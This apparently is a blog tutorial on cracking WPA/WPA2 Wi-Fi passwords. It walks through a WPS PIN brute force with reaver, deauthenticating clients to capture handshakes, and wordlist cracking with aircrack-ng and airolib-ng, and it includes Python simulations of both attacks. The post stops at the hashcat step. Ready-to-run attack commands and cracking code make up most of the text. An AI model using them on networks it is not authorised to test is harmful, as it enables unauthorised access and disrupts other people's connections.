Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

Category: LINUX

2017-09-29 13:58:29

#WPA cracking method with WPS enabled
In WPA every packet is encrypted with its own temporary key, so unlike WEP the number of data packets we collect is irrelevant: there is no statistical attack on the traffic itself.
WPA and WPA2 are similar from the attacker's point of view; the main difference is that WPA uses TKIP for per-packet encryption while WPA2 uses CCMP (AES-based). The attacks below work the same way against both.

WPS Feature
WPS (Wi-Fi Protected Setup) is a feature that lets users join a WPS-enabled network easily, by pressing the WPS button or by entering a PIN instead of the passphrase.
Authentication is done with an 8-digit PIN. The last digit is a checksum and the AP validates the PIN in two halves (the first 4 digits, then the remaining 3), so instead of 10^8 combinations an attacker needs at most 10^4 + 10^3 = 11,000 attempts, and brute force can find the PIN in less than 10 hours.
A tool called reaver recovers the PIN this way; once the PIN is accepted, the AP hands over the WPA/WPA2 PSK itself.
Note: This flaw is in the WPS feature and not in WPA/WPA2. It lets us recover the PSK of a WPA/WPA2 AP without a wordlist and without any connected client, but only when the AP has the WPS PIN method enabled; many APs also lock WPS after a few failed attempts, which makes the brute force much slower or stops it entirely.
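The two-half PIN check is what makes the brute force feasible. The following is an added example, not code from the original post or from reaver: it implements the WPS PIN checksum and runs the split search against a constructed stand-in for the AP's registrar. The FakeWpsRegistrar class and its reply strings are assumptions that only mimic the "NACK after M4 / NACK after M6" behaviour reaver relies on; they are not a real 802.11 or WPS protocol implementation.

```python
"""Added example: why an 8-digit WPS PIN falls in about 11,000 attempts.
Constructed stand-in for the AP; not reaver's code and not a real WPS implementation."""


def wps_checksum(first7: int) -> int:
    """Checksum digit of a WPS PIN, computed over the first 7 digits."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when the 8th digit matches the checksum of the first 7."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class FakeWpsRegistrar:
    """Constructed model of an AP running the WPS PIN exchange (an assumption, not
    protocol code). Like a real AP it validates the PIN in two halves: a wrong first
    half is rejected after M4, a wrong second half after M6, a correct PIN reaches M7."""

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin)
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK-M4"
        if pin[4:] != self._pin[4:]:
            return "NACK-M6"
        return "M7"


def brute_force_pin(ap: FakeWpsRegistrar):
    """Split search as reaver does it: up to 10^4 first halves, then up to 10^3
    second halves (the 8th digit is fixed by the checksum), 11,000 attempts worst case."""
    first_half = None
    for a in range(10_000):
        candidate = f"{a:04d}"
        # any second half will do while probing the first half
        if ap.try_pin(candidate + "0000") != "NACK-M4":
            first_half = candidate
            break
    if first_half is None:
        return None
    for b in range(1_000):
        seven = first_half + f"{b:03d}"
        pin = seven + str(wps_checksum(int(seven)))
        if ap.try_pin(pin) == "M7":
            return pin
    return None


def worst_case_attempts() -> int:
    """Size of the split search space versus 10**8 for a naive brute force."""
    return 10_000 + 1_000


if __name__ == "__main__":
    ap = FakeWpsRegistrar("12345670")  # well-known WPS test PIN, valid checksum
    print(brute_force_pin(ap), "found after", ap.attempts, "attempts")
```

The "0000" filler while probing the first half is the same trick reaver uses: the AP answers after M4 based on the first half alone, so the second half is irrelevant until the first is known.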

#cracking WPA/WPA2 with WPS feature
#wash lists nearby APs and shows whether WPS is enabled and whether it is locked; the interface must already be in monitor mode
wash -i wlan1

#arguments of wash
Required Arguments:
    -i, --interface=              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=                  Channel to listen on [auto]
    -o, --out-file=                Write data to file
    -n, --probes=                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -a, --all                            Show all APs, even those without WPS
    -h, --help                           Show help


#use reaver to crack WPA with WPS enabled (same monitor-mode interface as wash)
reaver -b [BSSID] -c [channel] -i [interface]
#-vv prints every PIN attempt and the AP's reply, which is how you notice rate limiting or a WPS lockout
eg:
reaver -b EC:88:XX:XX:XX:XX -c 1 -i wlan1
reaver -i wlan1 -b 78:A1:XX:XX:XX:XX -c 1 -vv

#WPA/WPA2 cracking with WPS disabled
As explained before, capturing ordinary WPA data packets is not useful: they contain nothing that can be used to recover the key.
The only packets that help us recover the passphrase are the handshake packets.
Every time a client connects to the AP a four-way handshake occurs between the client and the AP.
By capturing the handshake we can use aircrack-ng to run a wordlist attack against it and recover the key. We need two things:
1. the captured handshake
2. a wordlist

#create a wordlist.
crunch [min] [max] [charset] -t [pattern] -o [file]
#with -t, each @ in the pattern is replaced by every character of the charset and the other characters are kept literally;
#min and max must then both equal the pattern length. Quote a charset that contains shell metacharacters.
eg:
./crunch 6 6 '123456!"&$%' -o wordlist -t a@@@@b
crunch 8 8 aswrd0 -o wordlist -t P@@@@@@d
#use a named charset from a charset file instead of typing the characters
crunch 8 16 -f /path/to/charset.lst [charset-name]
crunch 8 16 -f /usr/share/rainbowcrack/charset.lst mixalpha-numeric -o mywordlist
#note: 8 to 16 characters of mixalpha-numeric is far too much data to store; crunch prints the total size before it starts, so narrow the range or pipe the output straight into aircrack-ng (-w -)

#kill the processes (NetworkManager, wpa_supplicant, dhclient) that would interfere with monitor mode; run this before putting the card into monitor mode
airmon-ng check kill


#use aircrack-ng to crack the key. For each password in the wordlist it computes the Pairwise Master Key (PMK) as
#PBKDF2-HMAC-SHA1(password, essid, 4096 iterations), derives the PTK from the PMK plus the MAC addresses and nonces taken
#from the handshake, and recomputes the EAPOL MIC with the PTK's KCK; a match against the MIC in the captured handshake
#means the password is right. Because the ESSID is the PBKDF2 salt, a PMK is only valid for one network name.
aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
eg:
aircrack-ng is-01.cap -w wordlist

#start airodump-ng locked on the target AP's channel and BSSID; -w sets the capture file prefix, so the capture lands in 18102he-01.cap
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX -w 18102he wlan1
#deauth a connected client so it reconnects and we capture the handshake (airodump-ng shows "WPA handshake:" in its top line once it has it)
aireplay-ng --deauth 4 -a 14:D6:XX:XX:XX:XX -c 1C:5C:XX:XX:XX:XX wlan1
#crack
aircrack-ng 18102he-01.cap -w wordlist

#cracking the key using airolib-ng (precompute the PMKs once per ESSID so repeated cracking runs skip the slow PBKDF2 step)
1. create a database and import the wordlist.
airolib-ng [db_name] --import passwd [dictionary]
eg:
airolib-ng is-db --import passwd list
airolib-ng 18102-db --import passwd wordlist

2. import the target ESSID (one per line, exact case: the ESSID is the PBKDF2 salt, so "18102He" and "18102he" give different PMKs)
airolib-ng is-db --import essid [essid-file]
eg:
airolib-ng is-db --import essid essid-name

echo "18102He" > 18102id
airolib-ng 18102-db --import essid 18102id

3. Compute the PMK for every (ESSID, password) pair in the database
airolib-ng [db-name] --batch
eg:
airolib-ng is-db --batch

airolib-ng 18102-db --batch

4. Crack the key using the PMK database
aircrack-ng -r [db-name] [handshake_file]
aircrack-ng -r is-db is-01.cap

aircrack-ng -r 18102-db 18102he-01.cap
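To make concrete what aircrack-ng does with a handshake and what airolib-ng precomputes, here is an added example that is not code from the original post or from the aircrack-ng suite. It derives the PMK with PBKDF2, the PTK with the 802.11i PRF and the EAPOL MIC for WPA2/CCMP, then runs a wordlist attack against a constructed message 2 of the four-way handshake. The ESSID is the one the post imports; the MAC addresses, nonces, passphrase, wordlist and the EAPOL frame are constructed values, and the PMK dictionary stands in for the airolib-ng database.

```python
"""Added example, not from the original post or aircrack-ng: the WPA2-PSK handshake
check that a wordlist attack performs, run against a constructed handshake."""
import hashlib
import hmac

# Constructed handshake parameters (not from a real capture)
ESSID = b"18102He"                       # ESSID used in the post (it is the PBKDF2 salt)
AP_MAC = bytes.fromhex("14d60000000a")   # placeholder BSSID
STA_MAC = bytes.fromhex("1c5c0000000b")  # placeholder client MAC
ANONCE = bytes(range(0x10, 0x30))        # 32-byte AP nonce from message 1
SNONCE = bytes(range(0x40, 0x60))        # 32-byte client nonce from message 2
TRUE_PASSPHRASE = "Passw0rd"             # what we pretend the AP is configured with
WORDLIST = ["password", "12345678", "Passw0rd", "letmein1"]
MIC_OFFSET = 81                          # Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP is 48 bytes = KCK(16) || KEK(16) || TK(16); the KCK keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor) with the MIC field zeroed."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, HMAC-SHA1 version
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce                     # key nonce
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + b"\x00" * 16               # key MIC, filled in by capture()
            + b"\x00\x00")               # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def capture() -> dict:
    """Stand-in for what airodump-ng saves: ESSID, MACs, nonces and message 2 carrying a valid MIC."""
    kck = kck_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"essid": ESSID, "ap": AP_MAC, "sta": STA_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


def precompute_pmks(essid: bytes, wordlist) -> dict:
    """What airolib-ng --batch does: one PMK per (ESSID, password), reusable for any handshake of that ESSID."""
    return {word: pmk_from_passphrase(word, essid) for word in wordlist}


def crack(handshake: dict, wordlist, pmk_db=None):
    """Wordlist attack: PMK -> KCK -> MIC per candidate; a MIC match reveals the passphrase.
    With pmk_db given, the PBKDF2 step is skipped, which is the airolib-ng speed-up."""
    target_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_db[word] if pmk_db is not None else pmk_from_passphrase(word, handshake["essid"])
        kck = kck_from_pmk(pmk, handshake["ap"], handshake["sta"], handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), target_mic):
            return word
    return None


if __name__ == "__main__":
    hs = capture()
    print("aircrack-ng style:", crack(hs, WORDLIST))
    print("airolib-ng style: ", crack(hs, WORDLIST, precompute_pmks(hs["essid"], WORDLIST)))
```

Almost all of the cost per candidate is the 4096-round PBKDF2; the PRF and MIC are a handful of HMACs. That is why a PMK database computed for one ESSID pays off across many handshakes of that network, and why a database computed for a different ESSID is useless.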

#speed up the cracking process with hashcat, which uses the GPU instead of the CPU for the PBKDF2 work.


#convert the handshake file format to hccap.